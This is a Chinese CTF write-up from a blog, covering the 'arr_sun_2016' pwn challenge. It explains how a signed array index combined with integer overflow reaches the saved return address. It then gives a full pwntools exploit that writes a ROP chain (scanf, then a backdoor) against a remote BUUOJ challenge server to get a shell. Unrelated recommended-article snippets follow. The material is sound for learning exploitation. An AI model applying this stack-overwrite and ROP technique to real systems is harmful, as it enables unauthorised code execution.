arr_sun_2016(从下标上溢跑到下标下溢)

最新推荐文章于 2024-07-25 10:00:08 发布
最新推荐文章于 2024-07-25 10:00:08 发布
阅读量390 收藏
点赞数
分类专栏: pwn 二进制漏洞 CTF 文章标签: 安全 PWN CTF 二进制漏洞 缓冲区溢出
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/seaaseesa/article/details/106693608
版权
pwn 同时被 3 个专栏收录
161 篇文章 24 订阅
订阅专栏
二进制漏洞
161 篇文章 9 订阅
订阅专栏
CTF
161 篇文章 9 订阅
订阅专栏

arr_sun_2016(从下标上溢跑到下标下溢)

首先,检查一下程序的保护机制

然后,我们用IDA分析一下,v2为有符号数,因此,这里存在下标越界的漏洞,但是是向上越界。

看似只能向上越界,实际,我们可以利用整数溢出,来达到劫持栈里的返回地址处。

列出等式

 int(ebp+eax*4-0x30) = int(ebp + 0x4)

求解得到int(4*eax)  = 0x34

满足条件的eax有多个,我们取eax=0x8000000D

这样,就可以劫持到返回地址处,做rop了。

#coding:utf8
from pwn import *

#sh = process('./arr_sun_2016')
sh = remote('node3.buuoj.cn',28197)
scanf = 0x08048460
format_str = 0x0804882F
bss = 0x08049B30
backdoor = 0x0804857B
pop_2 = 0x080487ba
sh.sendlineafter('What should I call you?','haivk')
def getIndex(offset):
   return str(0x8000000d-0x100000000 + offset)

def writeROP(rop):
   i = 0
   for item in rop:
      sh.sendlineafter('enter index',getIndex(i))
      sh.sendlineafter('enter value',str(item))
      i = i + 1

rop = [scanf,pop_2,format_str,bss,backdoor,0,bss,0,0,0]
writeROP(rop)

sh.sendline('/bin/sh\x00')

sh.interactive()

 

ha1vk
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Java考试复习
yxs19991011的博客
06-26 3558
java考试复习 1) 判断题、单选题、填空题看网上测试; 注意!!!(单选题答案里面的粗黑的有分号是代表同时满足;填空题答案里面的粗黑的有分号是代表其中一个就满足) 第1章 (做错的题目) 判断题 java有垃圾回收机制,内存回收程序可在指定的时间释放内存对象。(×) 解释: PPT解释(Java有一个系统级的线程,对内存的使用进行跟踪,该线程可以在系统空闲时对不用的内存进行回收,使程序员从繁忙的内存管理中解放出来。) JAVA虽然有垃圾回收机制,但是不能在指定的时间释放内存对象,只能在程序运
C编程百例
weixin_42561035的博客
09-01 486
//1.数据类型转换 #include<stdio.h&
C/C++学习笔记(2020.11---2021.5)
lzx的博客
05-08 3415
CPP旅途C/C++语言的诞生CCPlusPlus非标准库程序运行过程GNU编译器集合和LLVM项目gcc和g++标准库在计算机位置Linux/UNIXWindows命名空间定义命名空间using指令using关键字的其他作用不连续的命名空间嵌套的命名空间C预处理器define在define中使用参数##运算符变参宏#undef指令条件编译#ifdef、#else、#endif指令#ifndef指令#if和#elif指令#error#line#pragma基本数据类型和表达式基本数据类型输出数据大小整形无符
solidity—看了就会写!!!
weixin_63706760的博客
06-26 366
/ 版本号uint grade;// 结构体内部不能包含自己本身,但是可以是动态长度的数组,也可以是映射// 给在函数中的结构体初始化赋值时,都要手动将其声明为 storage 类型或者 memory 类型。// 初始化的第二种方式在 Solidity 中,有两个地方可以存储变量 ——storage或memory。Storage该存储位置存储永久数据,这意味着该数据可以被合约中的所有函数访问。可以把它视为计算机的硬盘数据,所有数据都永久存储。
C++学习笔记
xzc的博客
03-26 619
#include "iostream" //包含输入输出库的头文件 using namespace std; //使用c++标准命名空间 里面的定义,c++中很多标识符都定义在里面 // 说白了就是一个作用域(标识符的作用范围),不写该行,用对象时得标明是哪里的,如:std::cout<<endl; // 定义一个类,其实就是定义一个数据类型 // 在c++里面struct 是...
Java笔试题
weixin_30700099的博客
05-22 5950
JAVASE 部分 1、从以下选项中选择出三个正确的标识符 (Choose three)? A. IDoLikeTheLongNameClass B. $byte C. const D. _ok E. 3_case 答:ABD 2、以下哪两段代码可以正常编译通过 (Choose two)? A. int i=0; if (i) { System.out.println(“...
TogetherEC 6.3审计功能简单中文注解
somat的专栏
10-20 3421
Together 6.3 for Eclipse 3.0这个插件非常有用。我花了点时间看了Audits功能的docs,没有全部翻译,做了一些简单的中文注解。贴上来跟大家共享一下。这些条款中有一些对我们的设计、编码很有指导作用。Arrays and References 数组和引用Accessing null Reference (ANR) 访问空引用Array Index is Out of Ra
面试框架题整理
热门推荐
Jenius87v5的博客
04-15 2万+
面试题总结 一基础部分 1.1 集合 1.1.1 fail-fast 与 fail-safe 机制有什么区别 1.1.2 说出ArrayList,Vector, LinkedList的存储性能和特性 ArrayList 采用的是数组形式来保存对象的,这种方式将对象放在连续的位置中,所以最大的缺点就是插入删除时非常麻烦 LinkedList 采用的将对象存放在独立的空间中,而且在每个空间中还保存下一个链接的索引 但是缺点就是查找非常麻烦 要丛第一个索引开始 ArrayList和Vector都是用数组方
java基础 - 1
简单的专栏
04-02 1万+
目录 第一章:Java开始 1 学习目标 1 Java历史 2 Java技术概述 3 Java技术的优点 3 Java虚拟机 4 类加载器 6 Windows环境变量 8 内容总结 13 独立实践 14 第二章: 面向对象概述 15 学习目标 15 面向对象(Object Oriented) 16 面向对象的主要特性 18 抽象(Abstraction) 18 封装
Something-Important.rar_最大值下标 C++
09-24
标题中的“Something-Important.rar_最大值下标 C++”表明这是一个关于C++编程的教程或代码示例,重点在于找到数组中最大值和最小值的下标。在C++编程中,处理数组是非常常见的任务,而寻找数组中的最大值和最小值是...
PHP使用array_merge重新排列数组下标的方法
12-18
本文实例讲述了PHP使用array_merge重新排列数组下标的方法。分享给大家供大家参考。具体如下: 用了一个array_unique去除了一个数组里面的重复,但是发现下标保留了原数组的下标,但是php使用for循环需要下标整齐,...
num2arr.zip_16进制_matlab 二进制
09-23
标题中的"num2arr.zip_16进制_matlab 二进制"表明这是一个与MATLAB相关的项目,涉及16进制和二进制数据处理。这个压缩包可能包含一个MATLAB脚本(num2arr.m)以及一个图形化的输出示例(D1.jpg)。描述中提到“读取...
js_arr_splice.html
03-02
js_arr_splice.html
arr_macro-轻松初始化数组!-Rust开发
05-27
数组宏数组宏有助于初始化数组。 在初始化大型数组(大于32个元素)或执行以下...用法使用arr_macro :: arr; fn main(){让x:[Option ; 3] = arr![None; 3]; assert_eq!([无,无,无],x); //与所有人一起使用
微软蓝屏事件引发对构建更加稳固和安全的网络环境的思考
lupai的博客
07-24 474
综上所述,构建更加稳固和安全的网络环境需要政府、企业和用户共同努力,从政策、技术、用户行为等多个方面入手,形成全方位、多层次的网络安全防护体系。构建更加稳固和安全的网络环境是一个系统工程,需要从多个方面入手,包括政策、技术、用户行为等多个层面。建立完善的应急响应机制,制定应急预案和演练计划,提高应对网络攻击和突发事件的能力。鼓励和支持网络安全技术的研发和创新,推动新技术在网络安全领域的应用和推广。加强对用户的网络安全教育,提高用户的网络安全意识和防范能力。
极速下载!青苹果系统Win7旗舰版:稳定安全!
lihuiyun184291的博客
07-25 395
今天系统之家小编给大家带来了青苹果系统Win7旗舰版镜像,该版本系统离线制作而成,安全无病毒,还升级了防火墙功能,大家安装后时刻都能放心操作。同时,它是在保持原有的功能并适度优化,保留下来的功能轻松满足大家的使用需求,系统稳定性也很高,运作顺畅不卡顿。
企业如何保证公司内网安全
最新发布
shunyou0526的博客
07-25 309
部署防火墙和入侵检测系统:作为内网安全的第一道防线,防火墙和入侵检测系统能够有效阻止外部攻击和恶意软件的入侵。访问控制与身份验证:实施严格的访问控制策略,结合多因素认证(MFA),确保只有授权用户才能访问关键系统和数据。日志管理:建立全面的日志记录和审计机制,对所有数据访问、修改、删除等操作进行记录,以便于追踪和分析。电脑监控软件:使用电脑监控软件来监控员工的屏幕活动、上网行为等,防止内部威胁和不当使用公司资源。反病毒软件与反间谍软件:部署反病毒软件和反间谍软件等恶意软件防护工具,实时监测和清除恶意软件。
网络战时代的国家安全:策略、技术和国际合作
2301_79955948的博客
07-24 1127
网络战时代的国家安全涉及到策略、技术和国际合作等多个方面。
var arr_names:number[] = new Array(4) for(var i = 0; i<arr_names.length; i++) { arr_names[i] = i * 2 console.log(arr_names[i]) }代码解析
05-30
这段代码定义了一个包含4个元素的数组 `arr_names`,并使用 `for` 循环遍历数组,给每个元素赋值为其下标值乘以2,最后在控制台输出每个元素的值。 具体解析如下: 1. `var arr_names:number[] = new Array(4)`:定义了一个名为 `arr_names` 的数组,由于指定了类型为 `number[]`,因此只能存放数字类型的元素。通过 `new Array(4)` 创建一个包含4个元素的数组。 2. `for(var i = 0; i<arr_names.length; i++)`:使用 `for` 循环遍历数组,从下标0开始,到数组长度减1结束。 3. `arr_names[i] = i * 2`:给数组当前下标的元素赋值为下标值乘以2。 4. `console.log(arr_names[i])`:在控制台输出数组当前下标的元素值。 因此,最终输出结果为: ``` 0 2 4 6 ```
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值